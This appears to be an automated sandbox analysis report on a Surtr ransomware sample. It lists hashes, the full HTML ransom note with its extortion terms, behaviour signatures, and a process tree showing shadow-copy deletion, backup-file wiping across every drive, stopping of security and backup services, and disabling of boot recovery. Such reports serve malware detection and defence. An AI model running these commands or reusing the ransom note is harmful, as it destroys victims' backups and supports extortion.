Analysis
-
max time kernel
437s -
max time network
440s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
31-12-2024 23:46
General
-
Target
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
-
Size
320KB
-
MD5
e6fc190168519d6a6c4f1519e9450f0f
-
SHA1
af2080ddf1064fb80c7b9af942aaabf264441098
-
SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
-
SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
SSDEEP
6144:Q4K8rYBWqjbqL7busNWGl3GDmm+miR9zrmkdAZ:Q46QKbQJNDl3cmgiRlK
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\SURTR_README.hta
Ransom Note
<!DOCTYPE html><html lang="en"> <head> <meta http-equiv="x-ua-compatible" content="ie = 9"> <meta name="viewport" content="width = device-width, initial-scale = 1.0"> <title>SurtrRansomware</title> <HTA:APPLICATION ID="SurtrRansomware" APPLICATIONNAME="SurtrRansomware" icon=explorer.exe scroll=no contextmenu=no innerBorder=no windowState=maximize minimizeButton=no singleInstance=yes sysMenu=no VERSION="1.0" WINDOWSTATE="maximize"/> </head><style>@import url('https://fonts.googleapis.com/css2?family=Didact+Gothic&display=swap');@import url('https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.css');body { overflow: hidden; font-family: 'Didact Gothic', sans-serif; color:#333; box-sizing: border-box; }* { box-sizing: border-box; }a { text-decoration: none;}header { background-color: #f2f2f2; height: 90px; }nav { width: 960px; margin: 0 auto; display: flex; justify-content: space-between;}.logo { width: 100px;}.logo img { width: 100px; }.lang-menu { width: 100px; text-align: right; font-weight: bold; margin-top: 25px; position: relative;}.lang-menu .selected-lang { display: flex; justify-content: space-between; line-height: 2; cursor: pointer;}.lang-menu .selected-lang:before { content: ''; display: inline-block; width: 32px; height: 32px; background-image: url(https://www.countryflags.io/us/flat/32.png); background-size: contain; background-repeat: no-repeat;}.lang-menu ul { margin: 0; padding: 0; display: none; background-color: #fff; border: 1px solid #f8f8f8; position: absolute; top: 45px; right: 0px; width: 125px; border-radius: 5px; box-shadow: 0px 1px 10px rgba(0,0,0,0.2);}p{ display: -webkit-box; display: -ms-flexbox; display: inline; -webkit-box-pack: start; -ms-flex-pack: start; justify-content: flex-start; }.lang-menu ul li { list-style: none; text-align: left; display: flex; justify-content: space-between;}.lang-menu ul li a { text-decoration: none; width: 125px; padding: 5px 10px; display: block;}.lang-menu ul li:hover { background-color: #f2f2f2;}.lang-menu ul li a:before { content: ''; display: inline-block; width: 25px; height: 25px; vertical-align: middle; margin-right: 10px; background-size: contain; background-repeat: no-repeat;}.de:before { background-image: url(https://www.countryflags.io/de/flat/32.png);}.en:before { background-image: url(https://www.countryflags.io/us/flat/32.png);}.fr:before { background-image: url(https://www.countryflags.io/fr/flat/32.png);}.ar:before { background-image: url(https://www.countryflags.io/ae/flat/32.png);}.lang-menu:hover ul { display: block;}i { color: #dc143c; font-style: normal;}td{ font-size: 1.4rem; }@media only screen and (max-width: 1370px) { td{ font-size: 1rem; } h1.ex1 { font-size:1.2rem !important; } p.ex2{ font-size:1rem !important; } p.ex3{ font-size:1.4rem !important; } h1#noticefirst{ font-size:1.5rem !important; } } </style> </style> <body> <div style="margin-left: 60px; margin-right: 60px; margin-top:20px;"> <div style="display: inline; "> <p class="ex3" style="border-left: 6px solid rgb(255, 55, 55); font-size: 40px; background-color: rgb(255, 255, 255); padding-left: 10px; color: rgb(88, 88, 88); "><strong >SurtrRansomware</strong> </p> </div> <div style="width: 100%; border-radius: 4px; margin-top: 10px; border-style: solid; border-color: rgb(255, 78, 78); border-width: 0.5px; text-align: center; background-color: rgb(255, 249, 249); "> <h1 style="font-size: 1.8rem; margin-left: 10px; "> OOPS ALL YOUR <b style="color: #fff; background-color: rgb(248, 26, 26); padding: 4px; font-size: 1.8rem; ">IMPORTANT FILES</b> HAVE BEEN ENCRYPTED AND <b style="color: #fff; background-color: rgb(248, 26, 26); padding: 4px; font-size: 1.8rem; ">STOLEN !!</b></h1> </div> <h1 id="noticefirst" > Notice : There is only one way to restore your data read the boxes carefully! </h1> <div style="width: 100%; border-radius: 4px; border-style: solid; position: relative; border-color: rgb(248, 26, 26); border-width: 0.5px 0.5px 0.5px 25px; background-color: rgb(255, 227, 227); padding-top: 1%; padding-bottom: 1%; "> <div style="width: 100%; margin-top: -7px;"> <h1 class="ex1" style=" margin-bottom: 7px; margin-top: 0px; margin-left: 10px; font-size:1.8rem; color: #000; ">Attention :</h1> </div> <div style="width: 48%; display: inline-block; position: absolute; right : 0; "> <div style=" height:100%; margin-left: 15px; "> <table > <tbody> <tr> <td style="text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> Do Not change file names.</strong></td> </tr> <tr style="height: 56px; "> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong>Do Not try to decrypt using third party softwares , it may cause permanent data loss .</strong></td> </tr> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> If you do not pay the fee within one month , your important files will be published in our public belog .</strong></td> </tr> </tbody> </table> </div> </div> <div style="width: 48%; display: inline-block; "> <div style=" height:100%; margin-left: 15px; "> <table > <tbody> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> Do not pay any money before decrypting the test files.</strong></td> </tr> <tr style="height: 56px; "> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; "width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled.</strong></td> </tr> <tr > <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation .</strong></td> </tr> </tbody> </table> </div> </div> </div> <div style="width: 100%; border-radius: 4px; margin-top: 5px; "> <div style="width: 100%; display: flex; flex-direction: column; border-style: solid; padding top: 1%; padding-bottom: 1%; border-color: #4d53eb; border-width: 0.5px 0.5px 0.5px 25px; border-radius: 4px; background-color: #f3f3fc; " > <div><h1 class="ex1" style=" margin-bottom: 7px; margin-top: 0px; margin-left: 10px; font-size:1.6rem; color: #000; ">How To Decrypt :</h1></div> <div style=" height:100%; margin-left: 15px; "> <table style="table-layout: fixed; "> <tbody> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> Your system is offline . in order to contact us you can email this address <i> [email protected] </i> use this ID (<i style="color: #dc143c; " >7rt9O7r9IRuMSR</i>) for the title of your email .</strong></td> </tr> <tr style="height: 56px; "> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> If you weren't able to contact us within 24 hours please email : <i > [email protected] </i></strong></td> </tr> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible </i></strong></td> </tr> </tbody> </table> </div> </div> </div></body></html>
URLs
http-equiv="x-ua-compatible"
Signatures
-
Detects Surtr Payload 38 IoCs
-
Surtr
Ransomware family first seen in late 2021.
-
Surtr family
-
UAC bypass 3 TTPs 1 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Renames multiple (9724) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops startup file 6 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious use of SetThreadContext 1 IoCs
-
UPX packed file 41 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 64 IoCs
-
Interacts with shadow copies 3 TTPs 27 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo off3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4373⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 4374⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"3⤵
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB5⤵
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵
-
